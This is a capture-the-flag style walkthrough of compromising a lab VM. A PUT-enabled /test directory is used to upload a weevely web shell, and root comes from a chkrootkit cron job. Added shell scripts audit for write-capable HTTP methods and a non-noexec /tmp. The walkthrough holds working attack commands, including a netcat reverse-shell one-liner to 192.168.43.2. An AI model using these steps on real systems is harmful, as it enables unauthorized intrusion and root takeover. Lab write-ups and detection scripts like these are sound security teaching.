We set up the host and then start scanning it using nmap:
nmap -A -T4 -p- 192.168.1.20 -vv

Only two ports are open: 22 and 80.
Let's start scanning with dirb for directory listing and nikto for more information:

Dirb and nikto show a /test directory, so I sent an OPTIONS request with curl to that page and got a result (I had tried curl on the main page but nothing came up). Now we can see that the page allows the PUT method, which means we can upload a shell script to gain access.
Upload a malicious file using weevely (weevely is great and I use it a lot):
weevely generate 123456 shell.php
nmap -p 80 192.168.1.20 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='/root/shell.php'

Running weevely with weevely http://192.168.1.20/test/shell.php
and we got a shell.
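From the defender's side, the thing to catch here is a web server advertising write-capable methods at all. The following is an added example, not part of the original walkthrough: a small POSIX shell check that parses the Allow header of an HTTP OPTIONS response (the same header curl showed above) and reports any method that lets a client write into the document root. The sample response embedded in it is constructed, modelled on an Apache directory listing that permits PUT.

```shell
#!/bin/sh
# Added example (not from the original post): audit the Allow header of an
# HTTP OPTIONS response for methods that let clients modify server content.

# Read raw response headers on stdin; print each write-capable method on its
# own line. Exit status 1 if any were found, 0 if the server only allows
# read-style methods (GET, HEAD, OPTIONS, POST...).
write_methods_allowed() {
    tr -d '\r' | awk '
        tolower($0) ~ /^allow:/ {
            # "Allow: GET,HEAD,POST,OPTIONS,PUT" -> split the value on commas/spaces
            n = split(substr($0, index($0, ":") + 1), m, /[ ,]+/)
            for (i = 1; i <= n; i++) {
                u = toupper(m[i])
                # PUT/DELETE/PATCH and the WebDAV verbs all change content on disk
                if (u ~ /^(PUT|DELETE|PATCH|MKCOL|MOVE|COPY|PROPPATCH|LOCK)$/) {
                    print u
                    found = 1
                }
            }
        }
        END { exit (found ? 1 : 0) }'
}

# Constructed sample: what an OPTIONS request to a PUT-enabled /test/ might return.
SAMPLE_RESPONSE='HTTP/1.1 200 OK
Date: Mon, 01 Jan 2018 00:00:00 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS,PUT
Content-Length: 0
Content-Type: httpd/unix-directory'

# Stand-alone use: run the check over the sample and print a verdict.
if printf '%s\n' "$SAMPLE_RESPONSE" | write_methods_allowed; then
    echo "OK: no write-capable methods advertised"
else
    echo "WARN: the methods listed above should be disabled on the web server"
fi
```

On a live host you would feed it the output of `curl -s -i -X OPTIONS http://host/path/` instead of the sample. The fix on the server side is to restrict the directory to GET/HEAD/POST (on Apache 2.4 a `<LimitExcept GET POST HEAD>` block with `Require all denied`) and to make sure the document root is not writable by the web server's user, so that even a permitted PUT has nowhere to land.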

I spent some time on privilege escalation until I found a cron job using the ls -al /etc/cron* command, and then I noticed a file (chkrootkit).

This chkrootkit file is the way in for privilege escalation.
As the exploit-db post about this privilege escalation puts it: "If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this."
We need to write the following, as described in the exploit file, to gain root privileges (I tried a lot of scripts but this one worked for me):
echo '#!/bin/bash' > update
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f' >> update
chmod 777 update

And we are root. Viewing 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt showed that we successfully completed the task.
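The quoted advisory names the two conditions that make the cron-driven chkrootkit dangerous: /tmp is writable and not mounted noexec, and an executable named update is sitting there waiting for the next run. The script below is an added example, not from the original post, that audits a host for exactly those two conditions in POSIX shell; the mounts listing it checks is the /proc/mounts format, and the sample listing in the test is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): check for the conditions the
# chkrootkit advisory describes, so a defender can spot them before cron does.

# mount_has_noexec MOUNTS_FILE MOUNTPOINT
# Exit 0 if MOUNTS_FILE (in /proc/mounts format) shows MOUNTPOINT mounted
# with the noexec option, 1 if it is missing or lacks noexec.
mount_has_noexec() {
    awk -v mp="$2" '
        $2 == mp && $4 ~ /(^|,)noexec(,|$)/ { found = 1 }
        END { exit (found ? 0 : 1) }' "$1"
}

# has_stray_update DIR
# Exit 1 (finding) if DIR/update exists, printing its ownership and mode;
# exit 0 if it does not. chkrootkit 0.49 runs that file as root if present.
has_stray_update() {
    if [ -e "$1/update" ]; then
        printf 'FINDING: %s/update exists:\n' "$1"
        ls -ld "$1/update"
        return 1
    fi
    return 0
}

# Stand-alone use: audit this host.
if [ -r /proc/mounts ]; then
    if mount_has_noexec /proc/mounts /tmp; then
        echo "OK: /tmp is mounted noexec"
    else
        echo "WARN: /tmp is not a separate noexec mount; a dropped /tmp/update would run"
    fi
fi
has_stray_update /tmp || :
```

Running the audit from the same cron that runs chkrootkit (before it, and alerting on a non-zero exit) turns the advisory's precondition into a detection; mounting /tmp with noexec and upgrading chkrootkit past 0.49 remove the precondition itself.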